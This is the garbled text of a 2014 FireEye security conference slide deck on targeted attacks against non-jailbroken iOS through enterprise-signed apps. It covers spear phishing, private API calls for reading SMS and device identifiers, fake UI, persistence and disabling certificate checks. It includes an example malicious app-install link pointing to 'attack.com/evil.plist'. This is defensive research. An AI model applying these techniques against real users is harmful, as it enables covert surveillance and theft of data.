Embed Size (px)
Citation preview
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 1
Apple without A Shell iOS under Targeted Attacks
Tao (Lenx) Wei, Hui Xue, Min Zheng, Dawn Song Sep, 2014
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 2
iOS*is*Secure*
• Malware*– 13*malware*instances*for*iOS*Hll*now*
• 9*only*for*jailKbroken***
• Vulnerability*– Jailbreak*is*extraordinarily*hard*for*new*iOS*
• APT*against*iOS:*Impossible?*Too*Hard?*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 3
*Demo*
• Targeted*AVacks*against*NonKjailbroken*iOS*– Everything*starts*from*a*spear*phishing*message*
– Monitoring*text*messages*and*other*data*
– Persistently*• from*the*background*
• across*rebooHng*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 4
Demo*Targeted*AVack*Workflow*
**
User*Click*
Persistency*
Spear*Phishing*
Disable*OCSP*
Background*Monitoring*
AutoKrun*a\er*reboot*
InformaHon*Gathering*
Exploits*Abuse*
Private*API*Fake*UI*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 5
Agenda*
• Apple’s*Shell*– Review*Process*for*iOS*App*Store*
• Apple*without*A*Shell*– EnPublic*apps*
• Targeted*AVacks*using*EnPublic*Apps*– Spear*Phishing*– InformaHon*Gathering*– Persistency*
• Discussion*– Dilemma*of*iOS*Security*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 6
Apple’s*Shell*Review*Process*for*iOS*App*Store*
• Include*over*100*rules,*e.g.*– Apps*that*use*nonKpublic*APIs*will*be*rejected.*– Apps*that*download*code*in*any*way*or*form*will*be*rejected.*– Apps*that*install*or*launch*other*executable*code*will*be*rejected.*
– Apps*that*read*or*write*data*outside*its*designated*container*area*will*be*rejected.*
– MulHtasking*Apps*may*only*use*background*services*for*their*intended*purposes:*VoIP,*audio*playback,*locaHon,*task*compleHon,*local*noHficaHons,*etc.*
– Apps*that*create*alternate*desktop/home*screen*environments*or*simulate*mulHKApp*widget*experiences*will*be*rejected.*
– LocaHon*data*can*only*be*used*when*directly*relevant*to*the*features*and*services*provided*by*the*App*to*the*user*or*to*support*approved*adverHsing*uses.*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 7
Apple’s*Shell*Review*Process*for*iOS*App*Store*
• Very*effecHve*– Few*malware*instances*for*nonKjailbroken*iOS*
Name% Discovery%Date%
iOS/Toires.A!tr.spy* Nov*2009*
Adware/LBTM!iOS* Sep*2010*
iOS/FindCall.A!tr.spy* July*2012*
iOS/RCS* Jun*2014*
Data*from*ForHnet*and*Symantec*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 8
How*to*Bypass*The*Review*Process?*
• ObfuscaHon*– ACNS’13*
• Jekyll*AVacks*using*ROP*Chains*– Usenix*Security’13*
• Or*just*$299*!*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 9
$299:*The*iOS*Developer*Enterprise*Program**
• Enable*a*company*to*sign*inKhouse*apps*with*its*enterprise*distribuHon*cerHficate*
• Distribute*the*apps*to*employees*using*enterprise*provisioning*profiles*
• No*review*process!*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 10
EnPublic*Apps*
• Public*Apps*distributed*under*Enterprise*Provisioning*profiles*on*the*Internet*– itmsKservices://?acHon=downloadKmanifest&url=hVps://yourdomain.com/manifest.plist*
Country% Number%of%Apps%
United*States* 660*
China* 361*
England* 223*
France* 62*
Others* 102*
Total* 1408*
Stats*of*March*2014*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 11
Targeted*AVacks*using*EnPublic*Apps*
• No*review*process!*– Private*APIs*– Fake*UI*– FuncHonality*abuse*– ExploitaHons*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 12
Targeted*AVacks*using*EnPublic*Apps*
**
User*Click*
Persistency*
Spear*Phishing*
Disable*OCSP*
Background*Monitoring*
AutoKrun*a\er*reboot*
InformaHon*Gathering*
Exploits*Abuse*
Private*API*Fake*UI*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 13
Spearing*Phishing*through*EnPublic*Apps*Spear*
Phishing*
itmsKservices://?acHon=downloadKmanifest**********&url=hVps://aVack.com/evil.plist**
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 14
Abusing*Private*APIs*
Method% Framework% Func<onality%
CTSIMSupportCopyMobile*SubscriberIdenHty()*
Core*Telephony* Get*Device*IMSI*
[[UIDevice*currentDevice]*UniqueIdenHfier]*
UIKit* Get*Device*UDID*
SBSCopyApplicaHon*DisplayIdenHfiers()*
SpringBoardServices* Get*the*array*of*current*running*app*bundle*IDs.*
[[CTMessageCenter*sharedMessageCenter]*incomingMessageWithId:*result]*
Core*Telephony* Get*the*text*of*the*incoming*SMS*message.*
MobileInstallaHonLookup()* Mobile*InstallaHon* Get*the*bundle*ID*list*of*installed*iOS*apps.*
InformaHon*Gathering*
Exploits*Abuse%Private%API%
Fake*UI*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 15
Fake*UI*InformaHon*Gathering*
Exploits*Abuse*Private*API*
Fake%UI%
• Repackaging*benign*apps*– Popular*on*Android*
• Gather*accounts,*passwords*and*sensiHve*data*on*the*cloud*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 16
Exploits*InformaHon*Gathering*
Exploits*Abuse*Private*API*
Fake%UI%
• Do*not*need*full*jailbreak*
• Read/write/run*files*outside*the*sandbox*• Inject*into*other*processes*• Other*informaHon*leakage*
• E.g.*CVEK2014K4386,*arbitrary*file*write*– Introduced*in*jailbreak*before*iOS*7.1.1*– Fixed*correctly*only*at*iOS*8.0*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 17
Persistency*
• ConHnuous*monitoring*and*interacHon*in*order*to*achieve*the*defined*objecHves*
• A*challenge*for*apps*on*iOS*to*run*at*background*or*across*rebooHng*
Persistency*
Disable*OCSP*
Background*Monitoring*
AutoKrun*a\er*reboot*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 18
AutoKrun*
• Ordinary*iOS*apps*can’t*start*automaHcally*a\er*rebooHng*
• Only*VoIP*apps*are*allowed*to*start*automaHcally*a\er*the*system*reboot.*– Apple*forbids*nonKVoIP*apps*in*App*Store*from*using*this*feature*
– It’s*free*for*EnPublic*apps*
Persistency*
Disable*OCSP*
Background*Monitoring* AutoArun%
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 19
Disabling*OCSP*
• Apple*uses*the*Online&Cer)ficate&Status&Protocol&(OCSP)*to*validate*enterprise*cerHficates.*– Around*every*3K7*days*– It*has*the*chance*to*find*and*disable*abuse.*
• To*prevent*this,**aVackers*can*disable*OCSP.*– Exploit*some*vulnerabiliHes*to*change*the*Hmeout*field*of*the*OCSP*database*
Persistency*
Disable*OCSP*
Background*Monitoring* AutoArun%
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 20
EnPublic*AVacks*Low*Investment,*High*Return*
**
User*Click*
Persistency*
Spear*Phishing*
Disable*OCSP*
Background*Monitoring*
AutoKrun*a\er*reboot*
InformaHon*Gathering*
Exploits*Abuse*
Private*API*Fake*UI*
!*
!* !*
!*!* !*
!*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 21
Discussion*Dilemma*of*iOS*Security*
• Apple*doesn’t*allow*security*vendors*to*implement*systemKlevel*protecHons*
• EnPublic*malware*can*freely*call*powerful*private*APIs*and*exploit*vulnerabiliHes*
• Furthermore,*classic*network*security*devices*in*company*networks*can’t*protect*mobile*devices*all*the*Hme.*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 22
Conclusion*
• AVackers*can*use*EnPublic*apps*to*conduct*targeted*aVacks*against*iOS*users*– Gather*accounts,*passwords,*data*– Persistently*
• iOS*Security*faces*a*dilemma.*
• We*suggest*that**– Apple*may*consider*bringing*dedicated*security*vendors*into*iOS*for*enterpriseKlevel*security*soluHons.*
Copyright**©**2014,*FireEye,*Inc.**All*rights*reserved.***|***Mobile*Security* 23
**
Thanks**Tao&(Lenx)&Wei,&Hui&Xue,&Min&Zheng,&Dawn&Song&Mobile&Security&Team&Sep,&2014&
*
